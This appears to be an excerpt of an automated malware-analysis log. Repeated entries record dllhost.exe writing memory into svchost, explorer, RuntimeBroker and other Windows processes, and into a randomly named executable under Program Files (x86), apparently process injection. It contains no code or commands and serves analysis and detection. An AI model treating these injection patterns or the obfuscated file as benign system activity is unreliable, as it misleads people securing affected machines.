Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1988D570000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2108BCF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 29166900000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1988D570000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\explorer.exe base: 32F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 221D5930000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\explorer.exe base: 32F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60DA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DAC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F560310000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 195E2530000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 195E2560000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C4C590000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C4C5C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18DCC7D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18DCCA00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 14D83F10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 14D83F40000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1B927020000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1B927050000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2DE31080000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2DE310B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 790000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 800000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 14C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 14E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: C00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E30000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1250000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1270000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 12B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 12D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 6D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 6F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 900000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 920000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7E0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: CF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: D10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1450000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1470000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BE0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 15B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 15D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E70000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1420000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1440000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 13A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 13C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 590000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 5B0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 700000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 720000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 920000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 940000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1210000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1230000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DB0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1440000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1450000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1250000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 280000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 10F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1170000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2C0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1220000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: CF0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: D50000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: C00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A60000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1040000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1440000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1030000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1450000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 790000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: B00000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1250000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 860000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 280000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 810000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 10F0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1370000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BA0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11D0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2A0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: B20000
